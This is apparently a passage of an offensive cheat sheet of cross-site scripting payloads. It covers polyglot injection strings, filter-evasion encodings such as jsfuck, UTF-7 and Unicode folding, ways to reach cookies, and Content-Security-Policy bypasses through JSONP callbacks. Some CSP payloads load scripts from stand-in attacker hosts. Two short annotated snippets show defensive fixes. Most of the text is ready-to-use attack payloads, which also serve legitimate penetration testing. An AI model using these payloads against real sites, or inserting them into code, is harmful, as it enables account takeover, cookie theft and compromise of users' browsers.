">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
```
Polyglot XSS - Mathias Karlsson
```javascript
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
```
Polyglot XSS - Rsnake
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
Polyglot XSS - Daniel Miessler
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
```
Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
```javascript
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
```
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
```javascript
<svg%0Ao%00nload=%09((pro\u006dpt))()//
```
Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml)
```javascript
# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
```
Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
```javascript
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
```
## Filter Bypass and exotic payloads
### Bypass case sensitive
```html
<sCrIpt>alert(1)</ScRipt>
```
### Bypass tag blacklist
```html
<script x>
<script x>alert('XSS')<script y>
```
### Bypass word blacklist with code evaluation
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```
### Bypass with incomplete html tag
Works on IE/Firefox/Chrome/Safari
```javascript
<img src='1' onerror='alert(0)' <
```
### Bypass quotes for string
```javascript
String.fromCharCode(88,83,83)
```
### Bypass quotes in script tag
```html
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
<script>
<?php echo 'foo="text '.$_GET['test'].'";'; ?>
</script>
</html>
```
### Bypass quotes in mousedown event
You can bypass a single-quote filter with `&#39;` in an onmousedown event handler: the attribute value is entity-decoded by the HTML parser before the JavaScript in it is run.
```javascript
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
```
### Bypass dot filter
```javascript
<script>window['alert'](document['domain'])</script>
```
Convert an IP address into decimal format, e.g. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi
```javascript
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))</script>
```
Base64-encode your XSS payload with a Linux command, e.g. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
### Bypass parenthesis for string
```javascript
alert`1`
setTimeout`alert\u0028document.domain\u0029`;
```
### Bypass parenthesis and semi colon
```javascript
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
### Bypass onxxxx= blacklist
```javascript
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
// Bypass onxxx= filter with a null byte/vertical tab
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
// Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) />
```
### Bypass space filter
```javascript
// Bypass space filter with "/"
<img/src='1'/onerror=alert(0)>
// Bypass space filter with 0x0c/^L
<svg onload = alert(1) >
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
00000010: 6572 7428 3129 0c3e 0a ert(1).>.
```
### Bypass email filter
([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate))
```javascript
"><svg/onload=confirm(1)>"@x.y
```
### Bypass document blacklist
```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
window["doc"+"ument"]
```
### Bypass document.cookie blacklist
This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
```javascript
window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
```
### Bypass using javascript inside a string
```javascript
<script>
foo="text </script><script>alert(1)</script>";
</script>
```
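Both the PHP page under "Bypass quotes in script tag" and the `foo="text </script>..."` snippet above fail for the same reason: the HTML tokenizer closes a script element at the first `</script` it meets, without regard to JavaScript string quoting. The following added example (not code from the project) shows that unsafe embedding next to a hardened version that serialises the value with `JSON.stringify` and escapes `<`, `>`, `&` and U+2028/U+2029 as `\uXXXX`; the function names and the sample value are assumptions.

```javascript
// Added example (not from PayloadsAllTheThings): embedding untrusted data in
// an inline <script>. The unsafe form mirrors the PHP page and the
// foo="text ..." snippet above; the safe form is the fix.

// Unsafe: the value lands in a JavaScript string literal with nothing but the
// surrounding quotes. The HTML tokenizer ends the script element at the
// first "</script" it sees, whatever the JavaScript quoting state is.
function unsafeEmbed(value) {
  return '<script>\nfoo="text ' + value + '";\n</script>';
}

// Safe: serialise as a JSON string literal, then escape the characters the
// HTML parser cares about as \uXXXX sequences, which the JavaScript engine
// decodes back to the original characters at runtime.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')       // "</script>" and "<!--" cannot form
    .replace(/>/g, '\\u003e')       // nor "-->"
    .replace(/&/g, '\\u0026')       // entities in XHTML/SVG inline scripts
    .replace(/\u2028/g, '\\u2028')  // line terminators that older engines
    .replace(/\u2029/g, '\\u2029'); // reject inside string literals
}

function safeEmbed(value) {
  return '<script>\nfoo=' + jsStringLiteral('text ' + value) + ';\n</script>';
}

// Review check: a correctly embedded value leaves exactly one "<script" and
// one "</script" in the generated markup.
function scriptTagCount(html) {
  return (html.match(/<\/?script\b/gi) || []).length;
}

// Constructed sample: the breakout payload used on this page.
const SAMPLE = '</script><script>alert(1)</script>';

console.log(unsafeEmbed(SAMPLE)); // five script tags: the element is closed early
console.log(safeEmbed(SAMPLE));   // two script tags: the value stays a string
```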
### Bypass using an alternate way to redirect
```javascript
location="http://google.com"
document.location = "http://google.com"
document.location.href="http://google.com"
window.location.assign("http://google.com")
window['location']['href']="http://google.com"
```
### Bypass using an alternate way to execute an alert
From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet.
```javascript
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
```
From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables
The Object.keys() method returns an array of a given object's own property names, in the same order as a normal loop would. That means we can access any JavaScript function by using its **index number instead of the function name**.
```javascript
c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
// 5
```
Calling `alert` is then:
```javascript
Object.keys(self)[5]
// "alert"
self[Object.keys(self)[5]]("1") // alert("1")
```
We can find "alert" with a regular expression like `^a[rel]+t$`:
```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
// then you can use a() with Object.keys
self[Object.keys(self)[a()]]("1") // alert("1")
```
One-liner:
```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
```
From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
```javascript
prompt`${document.domain}`
document.location='java\tscript:alert(1)'
document.location='java\rscript:alert(1)'
```
From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet.
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](5);
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);
open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';
setTimeout`alert\u0028document.domain\u0029`;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```
### Bypass using an alternate way to trigger an alert
```javascript
var i = document.createElement("iframe");
i.onload = function(){
  i.contentWindow.alert(1);
}
document.body.appendChild(i); // document.appendChild(i) throws; the iframe must go under <body>
// Bypassed security
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
  var proxy = obj[name];
  obj[name] = function () {
    if (exec_original) {
      return proxy.apply(this, arguments);
    }
  };
  XSSObject.lockdown(obj, name);
};
XSSObject.proxy(window, 'alert', 'window.alert', false);
```
### Bypass ">" using nothing
You don't need to close your tags.
```javascript
<svg onload=alert(1)//
```
### Bypass "<" and ">" using ＜ and ＞
Unicode characters U+FF1C and U+FF1E (fullwidth less-than and greater-than signs)
```javascript
＜script/src=//evil.site/poc.js＞
```
### Bypass ";" using another character
```javascript
'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
'te' - alert('-') - 'xt';
'te' + alert('+') + 'xt';
'te' ^ alert('^') ^ 'xt';
'te' > alert('>') > 'xt';
'te' < alert('<') < 'xt';
'te' == alert('==') == 'xt';
'te' & alert('&') & 'xt';
'te' , alert(',') , 'xt';
'te' | alert('|') | 'xt';
'te' ? alert('ifelsesh') : 'xt';
'te' in alert('in') in 'xt';
'te' instanceof alert('instanceof') instanceof 'xt';
```
### Bypass using HTML encoding
```javascript
%26%2397;lert(1)
&#97;&#108;&#101;&#114;&#116;
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
```
### Bypass using Katakana
Using the [Katakana](https://github.com/aemkei/katakana.js) library.
```javascript
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
### Bypass using Cuneiform
```javascript
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```
### Bypass using Lontara
```javascript
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
### Bypass using ECMAScript6
```html
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
```
### Bypass using Octal encoding
```javascript
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```
### Bypass using Unicode
```javascript
Unicode character U+FF1C FULLWIDTH LESS-THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS-THAN SIGN (<)
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
%EF%BC%9E becomes >
%EF%BC%9C becomes <
```
### Bypass using Unicode converted to uppercase
```javascript
İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf).toUpperCase() => S
K (%E2%84%AA).toLowerCase() => k
<ſvg onload=... > becomes <SVG ONLOAD=...>
<ıframe id=x onload=>.toUpperCase() becomes <IFRAME ID=X ONLOAD=>
```
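The ordering of filtering and case conversion is what makes this work. As an added example (not the project's code), the blacklist below is applied before and after the application upper-cases the value, with the function names and sample inputs assumed for illustration; output encoding is shown as the fix that does not depend on ordering at all.

```javascript
// Added example (not from PayloadsAllTheThings): case mapping can turn an
// "unknown" tag name into a blocked one after the filter has already run.

const BLOCKED_TAGS = ['svg', 'iframe', 'script'];

// Naive tag blacklist, made case-insensitive with toLowerCase().
// toLowerCase() leaves U+017F (ſ) and U+0131 (ı) unchanged, so "<ſvg" and
// "<ıframe" never match "<svg" / "<iframe" here.
function containsBlockedTag(s) {
  const lower = s.toLowerCase();
  return BLOCKED_TAGS.some((t) => lower.includes('<' + t));
}

// Vulnerable ordering: validate, then transform. The transform (an
// upper-casing, e.g. for display) folds ſ -> S and ı -> I, so the output
// contains exactly the tag the filter was meant to reject.
function filterThenUppercase(input) {
  if (containsBlockedTag(input)) return null;
  return input.toUpperCase();
}

// Hardened ordering: apply every transformation the value will undergo
// first, then validate the final form.
function uppercaseThenFilter(input) {
  const transformed = input.toUpperCase();
  if (containsBlockedTag(transformed)) return null;
  return transformed;
}

// Output encoding for an HTML text context makes the ordering question moot:
// the angle brackets are gone before any case mapping happens, so no tag can
// form no matter which characters fold into which.
function htmlEncode(s) {
  return s.replace(/[&<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

// Constructed samples using the characters from the table above.
const SAMPLES = {
  longS: '<\u017Fvg onload=x>',           // ſvg
  dotlessI: '<\u0131frame id=x onload=>',  // ıframe
  plain: '<svg onload=x>',
};

console.log(filterThenUppercase(SAMPLES.longS));  // <SVG ONLOAD=X>  (filter missed it)
console.log(uppercaseThenFilter(SAMPLES.longS));  // null            (blocked)
console.log(htmlEncode(SAMPLES.longS).toUpperCase()); // &#60;SVG ONLOAD=X&#62;
```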
### Bypass using UTF-7
```javascript
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
```
### Bypass using UTF-8
```javascript
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9
```
### Bypass using UTF-16be
```javascript
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
```
### Bypass using UTF-32
```js
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
### Bypass using BOM
Byte Order Mark (the page must begin with the BOM character). A BOM lets you override the charset of the page.
```js
BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
BOM Character for UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
### Bypass using weird encoding or native interpretation
```javascript
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+
[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
```
### Bypass using jsfuck
Bypass using [jsfuck](http://www.jsfuck.com/)
```javascript
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
```
## CSP Bypass
Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and read the post: [How to use Google's CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)
### Bypass CSP using JSONP
**Requirements**:
* CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';`
**Payload**:
Use a callback function from a whitelisted source listed in the CSP.
* Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);`
* Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`
* Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();`
* Youtube: `https://www.youtube.com/oembed?callback=alert;`
* [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
```js
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
### Bypass CSP default-src
**Requirements**:
* CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`
**Payload**:
`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
```js
script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js';
window.frames[0].document.head.appendChild(script);
```
